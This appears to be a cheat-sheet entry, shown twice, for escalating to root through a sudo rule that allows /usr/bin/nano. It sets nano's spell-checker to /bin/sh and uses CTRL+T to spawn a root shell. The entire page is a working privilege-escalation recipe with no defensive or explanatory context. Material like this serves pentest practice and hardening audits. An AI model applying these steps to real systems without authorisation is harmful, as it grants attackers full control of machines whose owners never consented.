/usr/bin/nano
#Multi step process
sudo /usr/bin/nano -s /bin/sh
#Will redirect to nano shell, then type in:
/bin/sh
#Press CTRL + T to escape shell
#root
Last updated
#Multi step process
sudo /usr/bin/nano -s /bin/sh
#Will redirect to nano shell, then type in:
/bin/sh
#Press CTRL + T to escape shell
#root
Last updated